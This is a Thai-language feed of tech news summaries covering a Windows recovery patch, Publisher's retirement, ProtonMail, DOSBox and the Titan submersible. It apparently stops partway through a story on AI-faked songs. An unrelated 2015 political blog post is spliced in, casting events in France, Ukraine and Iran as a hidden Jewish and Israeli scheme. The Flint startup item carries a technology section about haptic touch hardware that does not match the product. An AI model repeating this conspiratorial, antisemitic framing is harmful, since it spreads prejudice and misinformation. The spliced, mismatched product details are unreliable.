“Microsoft รีบปล่อยแพตช์ฉุกเฉิน KB5070773 หลังอัปเดตพัง WinRE – คีย์บอร์ดและเมาส์ USB ใช้ไม่ได้ในโหมดกู้คืน”

Microsoft ต้องรีบออกแพตช์ฉุกเฉิน KB5070773 เพื่อแก้ปัญหาที่เกิดจากอัปเดต KB5066835 ซึ่งปล่อยออกมาเมื่อ 14 ตุลาคม 2025 โดยอัปเดตนั้นทำให้ระบบ Windows Recovery Environment (WinRE) บน Windows 11 เวอร์ชัน 24H2 และ 25H2 ไม่สามารถใช้งานคีย์บอร์ดและเมาส์แบบ USB ได้เลย

ปัญหานี้ร้ายแรงกว่าที่คิด เพราะ WinRE คือเครื่องมือหลักในการกู้คืนระบบ เช่น Startup Repair หรือ Reset This PC ถ้าอุปกรณ์อินพุตใช้ไม่ได้ ก็เท่ากับว่าผู้ใช้ไม่สามารถกู้ระบบได้เลย โดยเฉพาะในกรณีที่เครื่องบูตไม่ขึ้น

สำหรับผู้ที่ยังสามารถเข้าสู่ระบบ Windows ได้ แค่ติดตั้งแพตช์ KB5070773 ผ่าน Windows Update แล้วรีบูตเครื่องก็จะใช้งานได้ตามปกติ แต่ถ้าระบบเข้าไม่ได้เลย Microsoft แนะนำให้ใช้หน้าจอสัมผัส, พอร์ต PS/2 (ถ้ามี), หรือ USB recovery drive แทน

นี่เป็นครั้งที่สองในรอบไม่กี่เดือนที่ WinRE มีปัญหาใหญ่ เพราะในเดือนสิงหาคมก็เคยมีอัปเดตด้านความปลอดภัยที่ทำให้ฟีเจอร์ Reset This PC ใช้งานไม่ได้เช่นกัน ซึ่งทำให้หลายคนเริ่มตั้งคำถามถึงคุณภาพของการทดสอบก่อนปล่อยอัปเดตของ Microsoft

รายละเอียดแพตช์ KB5070773
แก้ปัญหา USB keyboard และ mouse ใช้ไม่ได้ใน WinRE
ส่งผลกระทบกับ Windows 11 เวอร์ชัน 24H2 และ 25H2
ปัญหาเกิดจากอัปเดต KB5066835 เมื่อ 14 ตุลาคม 2025
แพตช์ใหม่สามารถติดตั้งผ่าน Windows Update ได้ทันที
แก้ไขรวมอยู่ใน rollup ถัดไปสำหรับผู้ที่พลาดแพตช์ฉุกเฉิน

ผลกระทบและคำแนะนำ
ผู้ใช้ที่เข้า Windows ได้ควรติดตั้งแพตช์ทันที
ผู้ที่ติดอยู่ใน recovery loop ต้องใช้ touchscreen, PS/2 หรือ USB recovery drive
องค์กรสามารถใช้ Preboot Execution Environment (PXE) ผ่าน Configuration Manager

บริบทและความน่ากังวล
เป็นปัญหา WinRE ครั้งที่สองในรอบ 2 เดือน
ครั้งก่อนในเดือนสิงหาคมทำให้ Reset This PC ใช้งานไม่ได้
สะท้อนความเปราะบางของระบบอัปเดต Windows
Microsoft ยังไม่อธิบายว่าบั๊กนี้หลุดจากการทดสอบได้อย่างไร

https://www.tomshardware.com/software/windows/microsoft-rushes-out-emergency-windows-11-patch

มทร.ล้านนา จับมือ สสปท. ยกระดับมาตรฐาน SHE เตรียมความพร้อมนักศึกษา ก่อนเข้าสู่ตลาดแรงงานอย่างปลอดภัย
https://www.thai-tai.tv/news/22010/
.
#ไทยไท #มทรล้านนา #สสปท #ความปลอดภัยในการทำงาน #อาชีวอนามัย #SHE

ทำหน้าที่ ขุดคุ้ย สอดส่อง ฉวยโฉบเอกสาร แต่ถ้าใครคิดว่าแบนี้อิหร่านคงโป๊ไม่เหลือ เรียกว่ายังไม่รู้จักอิหร่านจริง!

แล้วก็เป็นไปตามคาด การเจรจาไม่เป็นผล ตกลงกันไม่ได้ วันสิ้นสุดการเจรจา ต้องมีการต่ออายุไปถึงกลางปี 2015 แสดงว่า อิสราเอลยังทำภาระกิจไม่สำเร็จ ระหว่างนี้หากมีการเปลี่ยนค่าย เปลี่ยนพฤติกรรม พวกซุ่มเงียบเปลี่ยนใจเปิดตัว อิสราเอลจะเอาอยู่ไหม น้ำมันในตะวันออกกลาง ยังเป็นของรัก ของหวง ของนักล่าใบตองแห้งและพวก โดยเฉพาะลูกพี่ชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่กบไต๋เงียบกริบ และใช้นักล่า ออกหน้าแทน… อย่างเคย

จะเห็นว่าอิสราเอล กำลังเล่นบทหนัก ในการหนุน หรือ ผลักดัน การขยับหมากของนักล่าใบตองแห้ง นอกจากนี้ อิสราเอลยังมีเป้าหมาย ลับลึกซ่อนอยู่อีกหลายเรื่อง

ถ้าสังเกตกัน จะเห็นว่า อิสราเอล พยายามเน้นให้เหตุการณ์ที่เกิดขึ้นที่ฝรั่งเศส เป็นเรื่องการรังแกยิว โดยนาย Liberman รัฐมนตรีต่างประเทศของอิสราเอล ซึ่งไปเดินแถวคล้องแขนที่ปารีสด้วย บอกว่า เขาดู CNN แล้ว ปรากฏว่า ไม่มีการเสนอข่าวในมุมของชาวยิวเลยนะ เช่น ซูเปอร์มาร์เก็ต Kosher ที่ยิงกัน ก็เป็นของชาวยิว หรือ พวกตัวประกัน ก็เป็นพวกชาวยิว พร้อมพูดว่า
” เราควรต้องพูดกันอย่างซื่อสัตย์ ไม่ต้องอาย และ เอาทุกอย่างวางบนโต๊ะ เพราะที่มาของการฆาตกรรมหมู่ชาวยิว มาจากมุสลิมเคร่งจัดด้านหนึ่ง และการด่าชาวยิวอย่างรุนแรงและไม่มีเหตุผลอีกด้านหนึ่ง”

นี่ก็เป็นการให้ข่าวแบบกาฝาก คราวนี้ฝากไปให้ใคร

ฝรั่งเศส มีชาวยิวอาศัยอยู่จำนวนมาก ไม่ต่ำกว่า 6 แสนคน นับเป็นอันดับ 3 ในโลก รองจากอิสราเอล และอเมริกา และฝรั่งเศส อีกเช่นเดียวกัน ที่มีคนนับถืออิสลามอาศัยอยู่มากที่สุดในยุโรป มีจำนวนไม่น้อยกว่า 4.7 ล้านคน ถึง 7.7 ล้านคน แล้วแต่แหล่งที่มาของข้อมูล

ยูเครน ที่กำลังเล่นกันจนเละ จะกลายเป็นโรงละครสัตว์อยู่แล้วนั้น อิสราเอลก็แอบสนับสนุนฝ่ายที่ต่อสู้กับคุณพี่ปูตินอย่างเงียบ เชียบ แต่แข็งขัน อย่าลืมว่า คุณนาย Nuland นางเหยี่ยวของอเมริกา เจ้าของวลีเด็ด **** EU เป็นคนเลือกนาย Yatsenyuk ยิวหนุ่ม ไปเป็นนายกรัฐมนตรียูเครน ยูเครนจึง ไม่ได้เป็นเพียงสนามชิงท่อส่งแก๊ส มีหลายฝ่าย แอบหวังที่จะเอายูเครน เป็นบ้านยิวสาขา 2

ฝรั่งเศสจึงน่าสนใจ ที่จะใช้เป็นสนามทดลอง หรือห้องทดลอง ทฤษฏีต่างๆ ก่อนมีการปฏิบัติการณ์ของจริง เพื่อดูปฏิกริยา การโต้ตอบ และกำลังสนับสนุนของแต่ละฝ่าย

ในการทำศึกสงคราม แต่ละฝ่าย ต่างมียุทธศาสตร์ และต่างมีวาระซ่อนเร้น ซึ่งเราอาจจะยังเห็นไม่หมด มองไม่ชัดในตอนนี้ เพราะพวกเขาคงจะยังไม่เปิดฉากแสดงกันที่สถานที่จริง หรือถ้าเปิด มันก็ดูเป็นฉาก ที่ไม่ต่อเนื่องกัน

เช่นเรื่องยูเครนกับตะวันออกกลาง อาจเกี่ยวโยงกันอย่างที่เรานึกไม่ถึง และเช่นเดียวกับการลงมติ คว่ำบาตรรัสเซีย ที่กลุ่มประเทศในสหภาพยุโรป กำลังทดสอบความแข็งของข้อกัน และคงจะรู้กันเร็วๆนี้ ว่า ใครกันแน่ ที่ข้อแข็งในสหภาพยุโรป

ส่วนเรื่องการคว่ำบาตรอิหร่าน ซึ่งสมาชิกรัฐสภาอเมริกันกลุ่มหนึ่ง กำลังกระเหี้ยน กระหือรือ ที่จะยื่นเรื่องให้รัฐสภา ลงมติเพิ่มการคว่ำบาตรอิหร่านเพิ่ม ทั้งที่การเจรจาเรื่องพัฒนานิวเคลียร์ ที่เพิ่งเริ่ม หลังจากมีการต่ออายุใหม่ และมีข่าวว่า นายโอบามาบอกว่า พยายามจะใช้สิทธิวีโต้ เพราะการเจรจากับอิหร่านยังไปได้อยู่

คงจะไม่เป็นเรื่องน่าแปลกใจ ถ้าการพยายามคว่ำบาตรอิหร่านเพิ่มนั้น ได้รับการสนับสนุนจากกลุ่มยิว ทั้งใน และนอกอเมริกา ถ้าอิหร่านล้มคว่ำตามบาตรในตะวันออกกลาง ที่จะลุกขึ้นตีปีกคืออิสราเอล เพราะถ้าเจอทั้งอิหร่าน และตุรกี พร้อมกัน ในตะวันออกกลาง มันเหนื่อยโว้ย สะกัดไปทีละประเทศ น่าจะดีกว่า ส่วนความฝันเรื่องยูเครน ถ้ารัสเซียหมดแรง ถอบฉากเลิกขวาง อิสราเอลก็หวานคอ เอะ นี่ตกลงเป็นเรื่องของยิวล้วนๆหรือไง แล้วพวกลูกพี่ ทั้งนักล่าใบตองแห้ง และชาวเกาะใหญ่เท่าปลายนิ้วก้อยฯ ที่คอยกำกับ ทุกรายการ ยังต้องการให้จัดการเรื่องอะไรอีกครับ ?!

สวัสดีครับ
คนเล่านิทาน
18 มค. 2558

“Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026 — ปิดตำนานเครื่องมือออกแบบยุค 90” — เมื่อแอปสร้างใบปลิวและจดหมายข่าวที่เคยอยู่ในทุกบ้านกำลังจะอำลาอย่างถาวร

Microsoft ประกาศว่าจะยุติการสนับสนุนแอป Publisher อย่างเป็นทางการในเดือนตุลาคม 2026 ซึ่งตรงกับวันหมดอายุของ Office LTSC 2021 โดยหลังจากวันนั้น Publisher จะถูกถอดออกจาก Microsoft 365 และไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีกต่อไปในเวอร์ชันใหม่

Publisher เปิดตัวครั้งแรกในปี 1991 เพื่อให้ผู้ใช้ทั่วไปสามารถออกแบบสิ่งพิมพ์ เช่น ใบปลิว, โบรชัวร์, จดหมายข่าว โดยไม่ต้องใช้โปรแกรมระดับมืออาชีพอย่าง QuarkXPress หรือ Adobe InDesign ด้วยราคาที่เข้าถึงได้และการใช้งานง่าย ทำให้ Publisher กลายเป็นเครื่องมือยอดนิยมในโรงเรียน, ธุรกิจขนาดเล็ก และผู้ใช้ตามบ้าน

แม้จะไม่เคยครองใจนักออกแบบมืออาชีพ แต่ Publisher ก็มีบทบาทสำคัญในการ “ประชาธิปไตยด้านการออกแบบ” โดยเปิดโอกาสให้ทุกคนสามารถสร้างสื่อสิ่งพิมพ์ได้ด้วยตัวเอง

หลังจากการยุติการสนับสนุน Microsoft แนะนำให้ผู้ใช้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู และหากต้องการแก้ไข ให้เปิด PDF ใน Word — แม้ว่าการจัดวางอาจเพี้ยน โดยเฉพาะไฟล์ที่มีกราฟิกจำนวนมาก

สำหรับผู้ใช้ที่ต้องการทางเลือกใหม่ Microsoft แนะนำให้ใช้ Word, PowerPoint หรือแอป Designer แทน ส่วนทางเลือกจากภายนอกก็มีเช่น:

Canva — ใช้งานง่าย มีเทมเพลตหลากหลาย แต่ฟีเจอร์เต็มต้องสมัครสมาชิก
LibreOffice Draw — ฟรีและโอเพ่นซอร์ส รองรับไฟล์ .pub ได้พอสมควร
Affinity Publisher 2 — ซื้อครั้งเดียว ไม่มีรายเดือน เหมาะกับผู้ใช้จริงจัง

Microsoft Publisher จะสิ้นสุดการสนับสนุนในเดือนตุลาคม 2026
ตรงกับวันหมดอายุของ Office LTSC 2021

Publisher จะถูกถอดออกจาก Microsoft 365
ไม่สามารถติดตั้งหรือเปิดไฟล์ .pub ได้อีก

Publisher เปิดตัวในปี 1991 และรวมอยู่ใน Office ตั้งแต่เวอร์ชัน 97
เคยเป็นเครื่องมือออกแบบยอดนิยมสำหรับผู้ใช้ทั่วไป

Microsoft แนะนำให้แปลงไฟล์ .pub เป็น PDF เพื่อเก็บไว้ดู
และเปิด PDF ใน Word หากต้องการแก้ไข

ทางเลือกใหม่จาก Microsoft ได้แก่ Word, PowerPoint และ Designer
ใช้แทน Publisher สำหรับงานออกแบบทั่วไป

ทางเลือกจากภายนอก ได้แก่ Canva, LibreOffice Draw, Affinity Publisher 2
มีทั้งแบบฟรีและเสียเงินตามระดับความสามารถ

https://www.slashgear.com/2001386/microsoft-ending-publisher-in-october-2026/

“ProtonMail จัดการอีเมลข่าวสารได้ดีกว่า Gmail — สะดวกกว่า ลึกกว่า และเป็นส่วนตัวมากกว่า” — เมื่อการจัดการ newsletter ไม่ใช่แค่การกด unsubscribe แต่คือการควบคุมข้อมูลของคุณ

บทความจาก It’s FOSS โดย Abhishek เล่าประสบการณ์ตรงจากการใช้ ProtonMail มานานกว่า 5 ปี โดยเปรียบเทียบฟีเจอร์จัดการอีเมลข่าวสาร (newsletter) ระหว่าง ProtonMail กับ Gmail ซึ่งแม้ทั้งสองจะมีฟีเจอร์คล้ายกัน แต่ ProtonMail กลับทำได้ดีกว่าในหลายด้าน

ใน Gmail ผู้ใช้สามารถเข้าไปที่ “Manage subscriptions” เพื่อดูรายชื่อผู้ส่งและกด unsubscribe ได้ แต่ข้อมูลที่แสดงค่อนข้างจำกัด เช่น จำนวนอีเมลที่ได้รับโดยประมาณ และไม่มีตัวเลือกเพิ่มเติมสำหรับจัดการอีเมลเก่า

ProtonMail นำเสนอฟีเจอร์เดียวกันในตำแหน่งที่เข้าถึงง่ายกว่า และแสดงข้อมูลละเอียดกว่า เช่น จำนวนอีเมลที่ได้รับในเดือนล่าสุด และจำนวนที่ยังไม่ได้อ่าน พร้อมตัวเลือกจัดการอีเมลเก่า เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว” ทั้งหมด

ที่สำคัญคือ ProtonMail ให้ผู้ใช้เลือกได้ว่าจะ “บล็อก” ผู้ส่งหรือแค่ “เลิกติดตาม” ซึ่งต่างกันมาก — การบล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น ในขณะที่การเลิกติดตามจะหยุดเฉพาะอีเมลข่าวสารเท่านั้น

ProtonMail ยังมีระบบ “จัดการแบบอัตโนมัติ” เช่น การย้ายอีเมลไปยังโฟลเดอร์เฉพาะ และการจัดเรียงตามความถี่หรือการอ่าน เพื่อช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเก็บหรือเลิกติดตามอีเมลใด

ProtonMail มีฟีเจอร์จัดการ newsletter ที่เข้าถึงง่ายกว่า Gmail
อยู่ในเมนู “Views” โดยไม่ต้องคลิก “More” เหมือน Gmail

แสดงข้อมูลละเอียด เช่น จำนวนอีเมลที่ได้รับและยังไม่ได้อ่าน
ช่วยให้ผู้ใช้ตัดสินใจได้ง่ายขึ้นว่าจะเลิกติดตามหรือไม่

มีตัวเลือกจัดการอีเมลเก่าเมื่อกด unsubscribe
เช่น ย้ายไปถังขยะ, เก็บถาวร หรือทำให้เป็น “อ่านแล้ว”

แยกการ “เลิกติดตาม” กับ “บล็อก” ผู้ส่งอย่างชัดเจน
บล็อกจะปิดกั้นการสื่อสารทั้งหมดจากอีเมลนั้น

สามารถย้ายอีเมลไปยังโฟลเดอร์เฉพาะและใช้กับอีเมลในอนาคต
คลิก “Apply to future messages” เพื่อจัดการอัตโนมัติ

มีระบบจัดเรียง newsletter ตามความถี่และการอ่าน
เช่น มากที่สุด/น้อยที่สุด, อ่านล่าสุด, ได้รับล่าสุด

ฟีเจอร์นี้มีในเวอร์ชันฟรีของ ProtonMail ด้วย
ไม่จำเป็นต้องจ่ายเพื่อใช้งานพื้นฐาน

https://news.itsfoss.com/protonmail-gmail-better-newsletter/

“Flint เปิดตัวเว็บไซต์อัตโนมัติ—สร้างเนื้อหาและปรับแต่งตัวเองโดยไม่ต้องมีมนุษย์”

ลองจินตนาการว่าเว็บไซต์ของคุณสามารถสร้างหน้าใหม่ ปรับแต่งดีไซน์ และเพิ่มประสิทธิภาพ SEO ได้เองโดยไม่ต้องมีทีมงาน—นี่คือแนวคิดของ Flint สตาร์ทอัพที่เพิ่งเปิดตัวแพลตฟอร์มสร้างเว็บไซต์อัตโนมัติเต็มรูปแบบ โดยใช้ AI เป็นแกนกลางในการจัดการทุกอย่าง ตั้งแต่การออกแบบไปจนถึงการเผยแพร่

ผู้ใช้เพียงแค่อัปโหลด content brief และลิงก์เว็บไซต์เดิม Flint จะวิเคราะห์ดีไซน์ของแบรนด์ แล้วสร้างหน้าเว็บใหม่ที่พร้อมใช้งานทันทีบนโดเมนจริง โดยไม่ต้องเขียนโค้ดหรือจัดการ CMS ใด ๆ

Flint ได้รับเงินลงทุน $5 ล้านจาก Accel, Sheryl Sandberg’s venture fund และ Neo เพื่อขยายการพัฒนา AI และระบบออกแบบอัตโนมัติ พร้อมเปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว

แนวคิดของ Flint
สร้างเว็บไซต์ที่สามารถอัปเดตและปรับแต่งตัวเองโดยอัตโนมัติ
ใช้ AI วิเคราะห์ดีไซน์และเนื้อหาเพื่อสร้างหน้าเว็บใหม่
ไม่ต้องเขียนโค้ดหรือใช้ CMS

วิธีการทำงาน
ผู้ใช้ส่ง content brief และลิงก์เว็บไซต์เดิม
Flint สร้างหน้าเปรียบเทียบ, landing page และ SEO content
เผยแพร่หน้าเว็บโดยตรงบนโดเมนของผู้ใช้

เทคโนโลยีเบื้องหลัง
ใช้ระบบ piezo haptic และ force sensing matrix สำหรับ UX
รองรับ deep-click zones และ gesture เฉพาะแอป
มีโปรไฟล์สำเร็จรูปสำหรับแอปยอดนิยม เช่น Photoshop, Office, Figma

การลงทุนและการเปิดตัว
ได้รับเงินลงทุน $5 ล้านจาก Accel และ Sheryl Sandberg
เปิดให้ลงทะเบียนเข้าร่วมเบต้าแล้ว
มีแผนขยายไปยังระบบ AI-driven design engineering

คำเตือนและข้อจำกัด
ข้อมูล SEO และ conversion ยังมาจากการรายงานภายในของบริษัท
ยังไม่มีการเปิดเผยว่า Google จะจัดอันดับเว็บไซต์ที่ปรับตัวเองอย่างไร
ความโปร่งใสและการควบคุมอาจเป็นประเด็นในระบบอัตโนมัติเต็มรูปแบบ

https://www.techradar.com/pro/new-startup-wants-to-build-self-updating-autonomous-websites-that-generate-content-and-optimize-themselves-without-human-intervention-i-wonder-what-google-will-make-of-this

"DOSBox Pure Unleashed: อีมูเลเตอร์ยุคใหม่ที่ปลดล็อกความคลาสสิกของเกม DOS"

หลังจากใช้เวลาพัฒนานานถึง 5 ปี Psyraven ได้เปิดตัว DOSBox Pure Unleashed อย่างเป็นทางการ—เวอร์ชันใหม่ของอีมูเลเตอร์ DOS ที่ไม่ต้องพึ่ง RetroArch อีกต่อไป และพร้อมใช้งานแบบ standalone บน Windows, macOS และ Linux

เวอร์ชันใหม่นี้มาพร้อม UI ที่ใช้งานง่าย และฟีเจอร์ล้ำ ๆ ที่ตอบโจทย์นักเล่นเกม retro โดยเฉพาะ เช่น การรันเกมจากไฟล์ ZIP โดยไม่ต้องติดตั้ง OS, รองรับกราฟิก Voodoo สูงสุดถึง 4K, การใช้ MIDI synth และ SoundFonts, รวมถึงระบบ save state และการตั้งค่าคอนโทรลเลอร์แบบอัตโนมัติ

ที่สำคัญคือการรองรับเกม Windows 9X แบบทดลอง ซึ่งเป็นก้าวสำคัญในการขยายขอบเขตของอีมูเลเตอร์ DOS ไปสู่ยุค Windows รุ่นเก่า

จุดเด่นของ DOSBox Pure Unleashed
เป็นเวอร์ชัน standalone ไม่ต้องใช้ RetroArch
รองรับ Windows, macOS และ Linux
UI ใช้งานง่าย แบ่งหมวดหมู่ชัดเจน
รันเกมจาก ZIP ได้ทันที ไม่ต้องติดตั้ง OS

ฟีเจอร์ใหม่ที่น่าสนใจ
รองรับ Voodoo graphics สูงสุด 4K/UHD
ใช้ MIDI synth และ SoundFonts ได้
มีระบบ save state และ shared system shells
รองรับการตั้งค่าคอนโทรลเลอร์อัตโนมัติ
มี on-screen keyboard และ mouse/joystick emulation

ความสามารถเพิ่มเติม
รองรับ Windows 9X แบบทดลอง
มีฟีเจอร์ auto-start และ advanced OS install options
มี CRT filters สำหรับภาพแบบยุคเก่า
รองรับ MT-32 และ SoundFont playback

คำเตือนในการใช้งาน
ฟีเจอร์ Windows 9X ยังอยู่ในขั้นทดลอง อาจไม่เสถียร
การตั้งค่าขั้นสูงอาจต้องใช้ความรู้ด้านเทคนิค
ไม่เหมาะสำหรับผู้ใช้ทั่วไปที่ต้องการ “คลิกแล้วเล่น” แบบง่าย ๆ

การสนับสนุนและชุมชน
มี Discord สำหรับพูดคุยและแลกเปลี่ยนเทคนิค
ดาวน์โหลดฟรี ขนาดไฟล์เล็ก ~1.5MB
ผู้พัฒนาหวังรับ “ทิป” ผ่านหน้า Itch.io

สาระเพิ่มเติมจากภายนอก:
ความสำคัญของ DOSBox ในวงการเกม retro
เป็นเครื่องมือหลักในการเล่นเกม DOS บนระบบปฏิบัติการยุคใหม่
ช่วยอนุรักษ์เกมเก่าและประสบการณ์การเล่นแบบดั้งเดิม

แนวโน้มของอีมูเลเตอร์ยุคใหม่
เน้นความง่ายในการใช้งานและความแม่นยำในการจำลอง
รองรับกราฟิกและเสียงระดับสูงเพื่อประสบการณ์ที่สมจริง

https://www.tomshardware.com/video-games/retro-gaming/dosbox-pure-unleashed-is-ready-for-windows-mac-and-linux-computers-after-five-years-in-development-enhanced-standalone-release-no-longer-restricted-to-being-a-retroarch-core

"ซากโลหะที่เคยเป็นสมองของ Titan: เบื้องหลังการพังทลายของระบบคอมพิวเตอร์ใต้น้ำลึก"

หลังจากเหตุการณ์การระเบิดของเรือดำน้ำ Titan ของ OceanGate ในปี 2023 ซึ่งคร่าชีวิตผู้โดยสารทั้งหมด การสืบสวนโดย NTSB (คณะกรรมการความปลอดภัยการขนส่งแห่งชาติของสหรัฐฯ) ได้เผยภาพและข้อมูลล่าสุดเกี่ยวกับสภาพของระบบคอมพิวเตอร์ภายในเรือ—ซึ่งถูกบดขยี้จนกลายเป็นกองโลหะบิดเบี้ยวที่แทบไม่เหลือเค้าโครงเดิม

ระบบคอมพิวเตอร์ของ Titan ประกอบด้วยพีซีแบบ fanless รุ่น Nuvo-5000LP จำนวน 3 เครื่อง ซึ่งทำหน้าที่เป็นสมองของเรือในการบันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก แต่หลังจากการระเบิด พีซีเหล่านี้กลายเป็นก้อนโลหะหนักกว่า 45 กิโลกรัมที่รวมเอาแผงวงจร โลหะ และพลาสติกอัดแน่นเข้าด้วยกัน

แม้จะมีความหวังว่าจะสามารถกู้ข้อมูลจาก SSD ได้ แต่การสแกน CT ไม่สามารถเจาะเข้าไปถึงชิปหน่วยความจำได้ และการใช้พลังงานสูงกว่านี้อาจทำลายข้อมูลที่เหลืออยู่ ทีมงานจึงส่งต่อซากไปยังห้องแล็บของ ATF ซึ่งสามารถแยกแผง SSD ออกมาได้ 2 แผง แต่พบว่าชิปหน่วยความจำเสียหายอย่างหนัก—บางชิปหายไป บางชิปแตกร้าว และไม่มีข้อมูลใดสามารถกู้คืนได้

สภาพของระบบคอมพิวเตอร์หลังเหตุการณ์
พีซี Nuvo-5000LP จำนวน 3 เครื่องถูกบดขยี้รวมกันเป็นก้อนโลหะหนัก ~45 กิโลกรัม
ทำหน้าที่บันทึกข้อมูลการทำงานและตรวจสอบโครงสร้างเรือแบบอะคูสติก
กล้องและอุปกรณ์อื่น ๆ เสียหายเกือบทั้งหมด ยกเว้นการ์ด SD ที่รอดมาได้ในเหตุการณ์อื่น

การสแกนและกู้ข้อมูล
ใช้ CT scan เพื่อตรวจหาชิปหน่วยความจำที่อาจรอด
ไม่พบช่องว่างที่ชิปอาจอยู่รอดได้
หลีกเลี่ยงการใช้พลังงานสูงในการสแกนเพื่อไม่ให้ข้อมูลเสียหาย

การวิเคราะห์โดย ATF
แยกแผง SSD ได้ 2 แผงจากซากโลหะ
พบว่าชิปหน่วยความจำบางส่วนหายไป และบางส่วนแตกร้าว
ไม่สามารถกู้ข้อมูลใด ๆ ได้จากแผงที่เหลือ

คำเตือนจากการออกแบบระบบ
การใช้พีซีแบบ fanless อาจไม่ทนต่อแรงดันและความร้อนจากการระเบิด
ไม่มีระบบป้องกันข้อมูลในกรณีฉุกเฉินหรือการระเบิด
การออกแบบระบบเก็บข้อมูลควรคำนึงถึงการกู้คืนหลังภัยพิบัติ

สาระเพิ่มเติมจากภายนอก:
ความท้าทายในการกู้ข้อมูลจากอุปกรณ์ที่เสียหาย
SSD มีโครงสร้างที่ซับซ้อนและเปราะบางต่อแรงกระแทก
การกู้ข้อมูลต้องใช้เทคนิคระดับสูง เช่น การสกัดชิปและอ่านข้อมูลโดยตรงจาก NAND

บทเรียนจาก Titan สำหรับการออกแบบระบบใต้น้ำ
ควรมีระบบบันทึกข้อมูลซ้ำในหลายตำแหน่ง
ใช้วัสดุที่ทนแรงดันและความร้อนสูง
ออกแบบให้สามารถกู้คืนข้อมูลได้แม้ในกรณีที่โครงสร้างหลักเสียหาย

https://www.tomshardware.com/tech-industry/oceangate-titan-computers-crushed-into-twisted-mass-of-metal-and-electronics-during-catastrophic-implosion-investigators-find-signs-of-thermal-damage-too

“DDR5 ทะลุ 13,000 MT/s ครั้งแรก!” — Corsair Vengeance และ GIGABYTE Z890 สร้างสถิติใหม่ในโลกการโอเวอร์คล็อก

ในโลกของการโอเวอร์คล็อก หนึ่งในเป้าหมายที่นักเล่นระดับสูงไล่ล่ามานานคือการทำให้ DDR5 ทะลุความเร็ว 13,000 MT/s และล่าสุดก็มีคนทำสำเร็จแล้ว! นักโอเวอร์คล็อกชาวเยอรมันชื่อ “sergmann” ได้สร้างสถิติใหม่ด้วย Corsair Vengeance DDR5 บนเมนบอร์ด GIGABYTE Z890 Aorus Tachyon ICE โดยจับคู่กับซีพียู Intel Core Ultra 9 285K และใช้ไนโตรเจนเหลวในการระบายความร้อน

ก่อนหน้านี้ “saltycroissant” เคยทำสถิติไว้ที่ 12,920 MT/s และเกือบจะทะลุ 13,000 MT/s แต่ sergmann แซงหน้าไปด้วยความเร็ว 13,010 MT/s ซึ่งได้รับการยืนยันจาก HWBot และ CPU-Z

แม้ความเร็วจะสูงมาก แต่ latency ก็สูงเช่นกัน (CL68-127-127-127-2) ทำให้ไม่เหมาะกับการใช้งานทั่วไป แต่ถือเป็นชัยชนะเชิงเทคนิคที่แสดงถึงศักยภาพของฮาร์ดแวร์ยุคใหม่ โดยเฉพาะเมนบอร์ด Z890 และหน่วยความจำ DDR5 รุ่นล่าสุด

ข้อมูลในข่าว
DDR5 ถูกโอเวอร์คล็อกทะลุ 13,000 MT/s เป็นครั้งแรก
นักโอเวอร์คล็อก “sergmann” ใช้ Corsair Vengeance DDR5 และ GIGABYTE Z890 Aorus Tachyon ICE
ซีพียูที่ใช้คือ Intel Core Ultra 9 285K
ใช้ไนโตรเจนเหลวในการระบายความร้อน
ความเร็วที่ทำได้คือ 13,010 MT/s (6504 MHz)
ได้รับการยืนยันจาก HWBot และ CPU-Z
ค่า latency อยู่ที่ CL68-127-127-127-2
IMC to Memory Clock ratio อยู่ที่ 3:190
ความเร็วระดับนี้ไม่เหมาะกับการใช้งานทั่วไป แต่เป็นการโชว์ศักยภาพ
เมนบอร์ด Z890 และซีพียู Ultra 200S มี memory controller ที่รองรับความเร็วสูง
Corsair, Gigabyte, Seasonic และ ThermalGrizzly มีส่วนสนับสนุนการทดสอบ

https://wccftech.com/ddr5-memory-officially-pushed-over-13000-mt-s-for-the-first-time/

“AI ปลอมเสียงศิลปินดังในคลิปไว้อาลัย Charlie Kirk” — เมื่อ YouTube กลายเป็นเวทีของบทเพลงที่ไม่มีใครร้องจริง

ผู้ใช้ YouTube หลายคนตกใจเมื่อพบคลิปไว้อาลัย Charlie Kirk นักเคลื่อนไหวฝ่ายขวาที่ถูกลอบสังหาร โดยมีเสียงร้องจากศิลปินดังอย่าง Adele, Ed Sheeran และ Justin Bieber — แต่ทั้งหมดเป็นเสียงที่สร้างจาก AI โดยไม่มีการร้องจริงหรือรับรู้จากเจ้าตัว

คลิปเหล่านี้ใช้ภาพประกอบที่ดูสมจริง เช่น thumbnails ที่ศิลปินร้องไห้ พร้อมเนื้อเพลงที่แต่งขึ้นจาก prompt เช่น “The angels sing your name” หรือ “Your story’s written in the stars” ซึ่งสร้างความซาบซึ้งให้ผู้ชมจำนวนมาก แม้เสียงจะไม่เหมือนต้นฉบับก็ตาม

AI music generators อย่าง Suno สามารถสร้างเพลงจากข้อความง่าย ๆ เช่น “ทำเพลงแจ๊สเกี่ยวกับรดน้ำต้นไม้” หรือ “เพลงแนว house เกี่ยวกับลาออกจากงาน” และเมื่อสื่อ AFP ทดสอบด้วย prompt ไว้อาลัยนักเคลื่อนไหว ก็ได้เพลงชื่อ “Star Gone Too Soon” และ “Echoes of a Flame” ภายในไม่กี่วินาที

แม้ YouTube จะมีนโยบายให้ผู้สร้างเนื้อหาต้องเปิดเผยว่าใช้ AI แต่หลายคลิปกลับซ่อนข้อมูลไว้ในคำอธิบายที่ต้องคลิกขยายถึงจะเห็น

นักวิจารณ์เช่น Alex Mahadevan จาก Poynter เตือนว่า “อินเทอร์เน็ตที่เคยเต็มไปด้วยคนสร้างสรรค์กำลังถูกแทนที่ด้วย AI slop ที่สร้างเพื่อเงิน” และ Lucas Hansen จาก CivAI เสริมว่า “การลอกเลียนเสียงและภาพควรได้รับการคุ้มครอง แม้จะเป็นคนที่เสียชีวิตแล้วก็ตาม”

ข้อมูลในข่าว
คลิปไว้อาลัย Charlie Kirk ใช้เสียง AI ปลอมเป็นศิลปินดัง
มี thumbnails ปลอม เช่นภาพศิลปินร้องไห้
